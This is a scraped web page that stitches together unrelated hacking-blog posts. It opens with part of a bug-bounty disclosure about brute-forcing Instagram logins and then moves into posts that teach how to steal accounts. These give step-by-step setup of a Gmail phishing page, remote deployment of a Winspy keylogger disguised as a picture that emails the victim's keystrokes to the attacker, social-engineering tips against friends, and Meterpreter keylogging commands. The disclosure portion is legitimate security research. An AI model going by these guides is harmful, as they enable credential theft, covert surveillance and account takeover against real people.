44.45 pw/s [====================] 100% (10001/10001) (Good:9999 Bad:9992 Error:0)

[End] Total time: 227 seconds

Notice that the first 1000 guesses were reliable (“good”) guesses, followed by 1000 unreliable ones (“bad”), which were ignored by the python script. Hereafter, the ratio remained closely around 50%. The numbers are slightly off due to lack of thread locks around the global variables storing them, as the purpose of the quick & dirty script was to simply prove the underlying vulnerability.

Although the script made 10001 password guesses for account “bruteforceme”, an attacker could simply login from any IP address, including the one that was used to mount the brute-force attack. This indicated a lack of additional security controls against account compromise, such as account lockout, IP address location-based fraud detection, …

ISSUE #2: CREDENTIALS ORACLE IN WEB REGISTRATION ENDPOINT

Since a couple of months, Instagram allows registration via its website as opposed to only via its mobile applications. Registering a test account “arneswinnen8168” with password “passwd” issued the following underlying request & response:

However, by simply replaying this exact request, a different response message was now encountered:

After removing all parameters in the request except “username” and “password”, the replay of a request with a correct password value and one of an incorrect password value highlights the credentials oracle:

Finally, a burp intruder brute-force attack of 10001 passwords, with the 10001th entry being the correct password “passwd”, confirmed the trivial brute-force attack:

Logging in with the harvested credentials again worked, no account lockout or other security controls were triggered during the successful brute-force attack:

FACEBOOK’S MITIGATIONS

Issue #1 was resolved by fixing the rate-limiting bug in the mobile authentication endpoint.
Issue #2 was resolved by introducing rate-limiting on the web registration endpoint.
The password policy was slightly hardened, and extremely easy passwords such as “123456” and “password” are now not allowed anymore.

TIMELINE

28/12/2015: Submitted bug report for issue #1 to Facebook Bug Bounty, including PoC python script.
08/02/2016: Submitted bug report for issue #2 to Facebook Bug Bounty.
11/02/2016: Facebook confirmed that issue #2 is patched.
13/02/2016: Facebook confirmed that issue #1 was patched earlier as well and granted a combined bounty of $5.000.
04/04/2016: Informed Facebook that fix for issue #2 is not effective.
10/05/2016: Facebook reconfirmed new fix for issue #2.
19/05/2016: New fix deemed working, public disclosure.

HACK FACEBOOK 2020

Posted by kelvin.mitnick on November 3, 2016 with 10 Comments

How to hack Facebook account, 2019

Okay, so you got lured into the idea of hacking a Facebook account? I won’t ask why. Everyone has their reasons. If you came here to learn how to hack a Facebook account, feel free to leave, because the title read – Hack Facebook Account : Stuff You Should Know – and not – How to hack a facebook account (well actually don’t leave, I have something for you later in this tutorial, something on actually hacking Facebook) .That being said, there are a lot of real hacking tutorials around the website you might want to read. However, if you are here on a pure curiosity basis, then read on, and you will be a smarter person by the end of this post than you were when you began reading it.

WHY NOT TO THINK ABOUT HACKING FACEBOOK

First, because you can’t. Well, actually you can, but the high improbability of success makes it stand next to you can’t hack facebook. If you think typing ‘hack facebook account’ on google, clicking on the first result, and entering the target’s email address will give you the password of his/her Facebook account, then you are not on the general level of stupidity, you have achieved an appreciatively high one. Come on, if it were so easy to hack a FB account no one would be using FB to start with. There is so much on our Facebook account that we can’t even imagine the consequences if it were to get into the hands of a seasoned hacker, leave alone a novice (not even a novice for that matter) who just searched google for hacking facebook.
impossible, so much so, that I won’t be exaggerating in saying that it can’t be hacked. As far as the picture on the left is concerned, its one of the many tools offered on the internet, all of which have the following in common-

All have very easy user interface. You just have to enter the user id, and click hack.
All have download links which will take you to a survey, or some annoying ads.
All are 100% not working.

WHAT DOES ‘HACKING FACEBOOK’ ACTUALLY MEAN?

What is the actual meaning of hacking Facebook. Most of us are misguided by the term hacking in general. Hacking incorporates the attainment of someone’s password, but hacking is so much more. Account passwords to hacking are just like coins are to the subway surfer game. You get coins along the way, your progress is partially judged on the basis of coins acquired, but the idea is to find your way through the obstacles and keep moving ahead. In general sense, when you use the term hacking Facebook, you mean to understand the functioning of the website, find out about its database management systems, scripts employed, use of cookies, language on which it is built on, etc. Then you find vulnerabilities in the working of the websites, and code exploits to break through the obstacles and gain privileges into their systems, using suitable payloads. The next step would be privilege escalation. For example, you found out a vulnerability that allows you to look into the database and see the email address and cellphone number of any user. You would want to escalate your privileges and also gain access to their passwords. The last step may be setting up a backdoor, for quicker access next time. Another step might be to clear your traces so that you don’t get caught. And trust me, you can’t do this. I mean you wouldn’t be reading a blog on beginner level hacking on Kali Linux if you had so far with web pen-testing. So, the conclusion is that hacking Facebook is a real big deal, not everyone’s piece of cake (I admit even I’m nowhere close to the level of expertise where I would be playing with databases on Facebook servers). And the Facebook passwords are just a reward that you get after hacking Facebook. But are we missing something? There can’t be only one way to get someone’s Facebook password. I mean we don’t want administrator access to all the Facebook databases, just a password of one of the millions of users. There must be a hole somewhere. That kid next door claims he can get Facebook password of anyone, and he’s good, but not ‘code a exploit for Facebook’ good, no, not that good. This is where social engineering steps in.

SOCIAL ENGINEERING

With time, the level of security in all fields of life keeps getting stronger. The element of encryption has reached almost unbeatable stage. With 256 bit encryption, cracking will take practically forever. The element of laziness is in our favor (not everyone upgrades to latest security measures), and so is the element of cost-effectiveness and carelessness (you don’t picture a nerd kid with glasses next door when you are deciding between WEP and WPA for your password). But nevertheless, things are changing, but one thing remains constant. Humans. Humans in general are stupid. Not really, a better word would be ignorant, not aware of how stuff works. Most Facebook users have no idea about what all Facebook is doing for their accounts security, and how easily their carelessness can ruin each and every one of Facebook’s effort to protect their private information.

HUMANS ARE THE WEAKEST LINK IN ANY SECURITY SYSTEM

From leaving one’s account logged in to not paying attention to someone who’s peeping from behind, watching them type their passwords, humans can be really ignorant. But we need not rely on this level of ignorance for passwords (I stopped using the word stupid because it’ll definitely annoy and offend people. I mean not good at computers doesn’t really mean stupid. They have other stuff to do than protect their accounts). We can very well get the password of an average internet user who is not very paranoid and cynical about stuff. We can’t hack Facebook and gain access to their servers, but your friends machine isn’t that well guarded. A virus binded with a game he asked you to fetch in a USB drive? An average person won’t think that you might have planted a trojan or a keylogger in the USB drive when he takes a file from you. Or maybe send him a link which will silently install some malware in his computer. Many people don’t think twice before clicking on a link (some people do, though). Or maybe make a fake login page and send him a professional looking email, directing him to a website where he ends up receiving a login page somehow (you have to make it look real and genuine, backed up by a nice story, that you can expect the target to buy). There are many more methods. As far as the promise for something later in this tutorial about actual Facebook hacking, I have provided you with a small trailer about what you can do, in the next few tutorials we will discuss stuff in detail. The first tutorial is here.

How to hack gmail account password

Posted by kelvin.mitnick on November 3, 2016 with 5 Comments

In this post i will show you various methods regarding “How to hack Gmail account password” OR How to hack gmail account password“,With my experience of 4 years i only suggest the two possible methods methods to hack gmail account passwords
1.PHISHING
2.KEYLOGGING
How to hack gmail account password

Installation Guide:

First of all Download:Gmail fake page

1.once you have downloded Gmail fake login page now extract contents in a folder
2.Now open login script(right click and then select edit) and find (CTRL+F) ‘http://rafayhackingarticles.blogspot.com‘ then change it to your to is the ‘http://www.google.com.pk‘
3.Note:‘http://www.google.com.pk‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.google.com.pk‘ instead of “http://rafayhackingarticles.blogspot.com“
Now Save it .
4.Create an id in www.110mb.com,www.ripway.com or t35.com.
Note:Lots of people have complaint that they get banned from 110mb.ripway and t35.com so as an alternative you can use ooowebhost.
5.Once you have created an account on 110mb.com ,then upload both the files in the directory
6.Now distribute http://yoursite.110mb.com/fakegmailpage.htm to your victim once victim logins through this page you will see something.txt file,download the fileto see the password inside

How it works ?
When a user types a Username Password in the the text box,The info is sent to “login.php” which acts as a password logger and redirects the page to “LoginFrame2.htm” which shows “There has been a temporary error Please Try Again” in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his gmail.com password hacked
Cheers ! you can leave your comments if you have lost your way !

Keylogging – Easy way:
The easiest way to hack gmail is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
I have posted an article on How to use sniperspy to hack password,Which will explain you more about keyloggers,Well there are many types of keyloggers used to hack password but in this article i will use Winspy keylogger to Hack gmail passwords

First of all free download Winspy keylogger software from link given below:

Download Winspy Keylogger

2. After downloading winspy keylogger to hack Gmail account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.

3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.

4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.

5. Now, Winspy’s main screen will be displayed as shown in image below:

6. Select Remote at top, then Remote install.

7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.

.user – type in the victim’s name

.file name – Name the file to be sent. Use the name such that victim will love to accept it.

.file icon – keep it the same

.picture – select the picture you want to apply to the keylogger.

In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id

Thats it. This much is enough. If you want, can change other settings also.

8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Gmail account password.

10 ways hackers can hack your facebook account and how to prevent it

Posted by admin on October 11, 2016 with 0 Comment

Facebook hack is rampant online at this internet age, your facebook can be hacked if not secured well. I have created an interactive image with guidelines of how a facebook account can be hacked, and the reverse process which is preventing it.

How to Hide Your IP Address Online

Posted by admin on October 11, 2016 with 0 Comment

Every computer on the Internet has a unique IP address allotted to it which makes it possible to trace it back to its exact location. However, there are ways to hide IP address online! In this post, I will discuss some of the popular ways to hide your IP address so that your identity and privacy are kept safe.
How to Hide Your IP?

Following are some of the most common ways to hide IP address on the Internet:

1. Using a VPN Proxy – Safe and Secure Way to Hide IP

Using a trusted VPN proxy service is by far the best way to conceal your IP address online. Here is a list of most popular VPN services that will hide your IP address:

Hide My Ass VPN – Hide My Ass is one of the most popular and trusted VPN service that allows people to easily conceal IP address and protect their online privacy.
VyprVPN – VyprVPN offers the world’s fastest VPN services that allows people to easily conceal their real IP.

Following are some of the advantages of using a VPN to hide your IP address:

In addition to hiding your IP, a VPN is very fast, offers high performance and encrypts all your web traffic to keep you safe from hackers and intruders.
You have a long list of countries and states to select your desired IP address location.
By selecting an IP address of your choice, a VPN allows you to easily access restricted websites that are not available for your country.

Why Hide IP Address?

Following are some of the reasons why people want to hide their IP address:

By hiding the IP address, one can browse anonymously.
To access websites that are not available to the IP address of a particular Geo location.
To stay safe from hackers by showing a fake IP to the outside world while keeping real IP concealed.
Hiding IP means hiding Geo location.
Hiding IP prevents leaving a digital footprint.

2. Web Based Proxies

This is another popular way to quickly hide IP address on the Internet. Following are some of the popular web based proxies to conceal your IP address:

www.proxysite.com
www.newipnow.com
www.filterbypass.me

The downside of using these free proxy services to mask your IP address is that most of them are overloaded and are too slow to use. In addition, your security and privacy may get compromised during the usage.

Hacking Phone or PC remotely with Remote Keyloggers

Posted by admin on October 3, 2016 with 7 Comments

Because the keylogger is mightier than the sword

In this tutorial, we’ll attempt to remotely install a keylogger. This one is actually quite basic, so without further ado, let’s begin.

Fire up Metasploit and let’s get started. Like before, we’re assuming that the system has already been broken into and we have the meterpreter session.

Step 1: Find a program.
The way the keylogger in Meterpreter works is, you have to attach it to a running program. Say for example, we find that the victim’s computer is running an internet browser, a game and MS Word. Clearly there’s two items of interest in there. We can attach the keylogger to the browser or MS Word to get whatever’s being typed in these two applications. So, first we check what all processes are running on the target system using the following command:

meterpreter >ps

Usually you’ll get a very long list of items. The two columns we’re interested in are PID (Process ID) and process name. For this step you may want to google up the names of some processes to see which programs they belong to or if you find the ones you know of, like chrome.exe (Google Chrome) or notepad.exe then you can use these. We need to migrate meterpreter to the corresponding PID. Suppose we found wordpad.exe at PID=1440

meterpreter > migrate 1440

You should see a message “Migration completed successfully”.

Step 2: Start the Keylogger
Now we can embed the keylogger into the program.The Meterpreter keylogger is a built-in feature called keyscan. We can start it up by the following command:

meterpreter> keyscan_start

This should successfully attach the keylogger to our preferred program and the keylogging will start immediately.

Step 3: Dump the logged Keystrokes
So, in the previous step we hooked up a keylogger to the WordPad application running on our victim’s computer. It’ll keep running until we tell it to stop (or the victim shuts down the computer). We can recover whatever the keylogger has logged by the following command. You might want to wait a while, maybe grab a snack while the keylogger is running on the system just to give it enough time to log something. It’s pretty much hit and trial since we don’t know when the victim is going to choose the application we’re keylogging and type something in it. They could be typing in it just as we hooked up the keylogger or they may not use the application for hours.

meterpreter> keyscan_dump

If all went great and the victim actually typed something in our chosen application meterpreter will print out everything in our command shell. You could try using different applications to get different results. Obviously you’ll not get anyone’s passwords by keylogging WordPad whereas chrome.exe and firefox.exe are much more likely to give us something of more interest.